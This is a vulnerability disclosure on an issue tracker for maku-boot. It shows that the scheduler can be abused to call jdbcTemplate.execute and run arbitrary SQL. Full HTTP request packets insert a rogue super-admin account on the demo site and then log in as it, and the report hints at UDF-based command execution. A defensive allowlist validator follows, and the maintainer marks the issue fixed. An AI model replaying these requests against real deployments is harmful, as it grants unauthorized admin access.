MAKU / maku-boot

Any sql statement execution vulnerability

Status: Completed
Created on 2022-11-07 16:16

Impact

Version: maku-boot v1.3.0 to v2.2.0
Users with the "schedule" permission can execute arbitrary SQL statements, and potentially achieve RCE.

Code Audit

The vulnerability code is located at:

  1. https://github.com/makunet/maku-boot/blob/master/maku-boot-module/maku-module-quartz/src/main/java/net/maku/quartz/utils/AbstractScheduleJob.java
  2. https://gitee.com/makunet/maku-boot/blob/master/maku-boot-module/maku-module-quartz/src/main/java/net/maku/quartz/utils/AbstractScheduleJob.java
    [screenshot]

An exploitable method has to satisfy the following conditions:

  • The class that defines the method is in the spring bean container.
  • The method has only one parameter, and the parameter type must be a string.
  • The method must be public.

Deploy maku-boot locally and write auxiliary code to find a method that meets the above conditions:
[screenshot]

Visit http://localhost:8080/index
[screenshot]

This turns up org.springframework.jdbc.core.JdbcTemplate#execute(java.lang.String), a method that executes any SQL statement it is given.
The next section is the exploit procedure.

Steps to reproduce

Visit the official demo site: https://demo.maku.net/maku-boot/#/login

  1. Log in with username 'admin' and password 'admin'.
    [screenshot]

  2. After logging in, go to https://demo.maku.net/maku-boot/#/quartz/schedule/index and add a scheduled task.
    Click the Add button shown in the screenshot below.
    [screenshot]

Fill in the following important parameters and click the submit button in the image below:

  • bean name: jdbcTemplate
  • method name: execute
  • method param: INSERT INTO sys_user (id, username, password, real_name, avatar, gender, email, mobile, status, org_id, super_admin, version, deleted, creator, create_time, updater, update_time) VALUES (10099, 'test123', '{bcrypt}$2a$10$mW/yJPHjyueQ1g26WNBz0uxVPa0GQdJO1fFZmqdkqgMTGnyszlXxu', 'test', 'https://cdn.maku.net/images/avatar.png', 0, 'babamu@126.cn', '13612345586', 1, null, 1, 0, 0, 10000, now(), 10000, now());

[screenshot]

The packet is as follows:

POST /maku-boot-server/schedule HTTP/1.1
Host: demo.maku.net
Cookie: Hm_lvt_dd01f60c05c4a94d3287dd7c580372ff=1667440588; Hm_lpvt_dd01f60c05c4a94d3287dd7c580372ff=1667468738
Content-Length: 583
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Accept-Language: zh-CN
Sec-Ch-Ua-Mobile: ?0
Authorization: 06f170e5cdbf4c83b5e3ba5ffc4cde98
Content-Type: application/json;charset=UTF-8
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.maku.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.maku.net/maku-boot/
Accept-Encoding: gzip, deflate
Connection: close

{"id":"","jobName":"test","jobGroup":"default","beanName":"jdbcTemplate","method":"execute","params":"INSERT INTO sys_user (id, username, password, real_name, avatar, gender, email, mobile, status, org_id, super_admin, version, deleted, creator, create_time, updater, update_time) VALUES (10099, 'test123', '{bcrypt}$2a$10$mW/yJPHjyueQ1g26WNBz0uxVPa0GQdJO1fFZmqdkqgMTGnyszlXxu', 'test', 'https://cdn.maku.net/images/avatar.png', 0, 'babamu@126.cn', '13612345586', 1, null, 1, 0, 0, 10000, now(), 10000, now());","cronExpression":"* * * * * ? *","status":0,"concurrent":1,"remark":""}

  3. Click the Run button shown in the screenshot below to execute the scheduled task you just created.
    [screenshot]

The packet is as follows:

PUT /maku-boot-server/schedule/run HTTP/1.1
Host: demo.maku.net
Cookie: Hm_lvt_dd01f60c05c4a94d3287dd7c580372ff=1667440588; Hm_lpvt_dd01f60c05c4a94d3287dd7c580372ff=1667468738
Content-Length: 618
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Accept-Language: zh-CN
Sec-Ch-Ua-Mobile: ?0
Authorization: 06f170e5cdbf4c83b5e3ba5ffc4cde98
Content-Type: application/json;charset=UTF-8
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.maku.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.maku.net/maku-boot/
Accept-Encoding: gzip, deflate
Connection: close

{"id":24,"jobName":"test","jobGroup":"default","beanName":"jdbcTemplate","method":"execute","params":"INSERT INTO sys_user (id, username, password, real_name, avatar, gender, email, mobile, status, org_id, super_admin, version, deleted, creator, create_time, updater, update_time) VALUES (10099, 'test123', '{bcrypt}$2a$10$mW/yJPHjyueQ1g26WNBz0uxVPa0GQdJO1fFZmqdkqgMTGnyszlXxu', 'test', 'https://cdn.maku.net/images/avatar.png', 0, 'babamu@126.cn', '13612345586', 1, null, 1, 0, 0, 10000, now(), 10000, now());","cronExpression":"* * * * * ? *","status":0,"concurrent":1,"remark":"","createTime":"2022-11-07 11:23:34"}

Once the SQL statement has executed successfully, an administrator user test123/admin exists.

  4. Log in to the system as test123/admin.
    [screenshot]

The packet is as follows:

POST /maku-boot-server/sys/auth/login HTTP/1.1
Host: demo.maku.net
Cookie: Hm_lvt_dd01f60c05c4a94d3287dd7c580372ff=1667440588; Hm_lpvt_dd01f60c05c4a94d3287dd7c580372ff=1667468738
Content-Length: 104
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
Accept-Language: zh-CN
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.maku.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.maku.net/maku-boot/
Accept-Encoding: gzip, deflate
Connection: close

{"username":"test123","password":"admin","key":"30aef83e-2804-49ea-acb5-b5678cdc27dc","captcha":"bdrgr"}

Login successful
[screenshot]

In addition, since any SQL statement can be executed and maku-boot supports MySQL and PostgreSQL databases, a UDF could be used to escalate privileges and execute commands.
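As an added, defender-side example that is not part of this report or of the maku-boot code base: a Python validator, modelled on the schedule-creation request body shown above, that applies the check the scheduler lacks, namely an explicit allowlist of (beanName, method) pairs instead of reflectively invoking any public single-string-parameter method on any Spring bean. The allowlist contents, the length limit and the sample bodies are assumptions constructed for the example.

```python
import json
import re

# Allowlist of (beanName, method) pairs the scheduler may invoke. The entries
# are a constructed assumption; a real deployment lists only its own job beans.
ALLOWED_JOBS = {
    ("reportJob", "run"),
    ("cleanupJob", "purge"),
}

# Job parameters should be simple values, so SQL-looking content is refused
# even for allowlisted jobs. Pattern and length limit are assumptions.
_SQL_HINT = re.compile(r"\b(insert|update|delete|select|drop|alter|create|load_file)\b", re.I)
MAX_PARAM_LEN = 256


def validate_schedule_request(body: str):
    """Validate a schedule JSON body of the shape shown in the report.

    Returns (ok, reason). Anything not on the allowlist, such as
    jdbcTemplate.execute, is refused before any bean is looked up."""
    try:
        task = json.loads(body)
    except json.JSONDecodeError:
        return False, "body is not valid JSON"
    bean = task.get("beanName")
    method = task.get("method")
    params = task.get("params", "")
    if not isinstance(bean, str) or not isinstance(method, str):
        return False, "beanName and method must be strings"
    if (bean, method) not in ALLOWED_JOBS:
        return False, f"{bean}.{method} is not an allowlisted scheduler job"
    if not isinstance(params, str) or len(params) > MAX_PARAM_LEN:
        return False, "params must be a short string"
    if _SQL_HINT.search(params):
        return False, "params contain SQL-like content"
    return True, "ok"


# Constructed sample bodies; the first mirrors the fields of the request above.
MALICIOUS_BODY = json.dumps({
    "id": "", "jobName": "test", "jobGroup": "default",
    "beanName": "jdbcTemplate", "method": "execute",
    "params": "INSERT INTO sys_user (id, username) VALUES (10099, 'test123');",
    "cronExpression": "* * * * * ? *", "status": 0, "concurrent": 1, "remark": "",
})
BENIGN_BODY = json.dumps({
    "beanName": "reportJob", "method": "run", "params": "daily",
    "cronExpression": "0 0 2 * * ?", "status": 0, "concurrent": 0,
})
```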

Comments (1)

TGAO created the task
TGAO edited the description

Fixed, thanks.

阿沐 changed the task status from To do to Completed
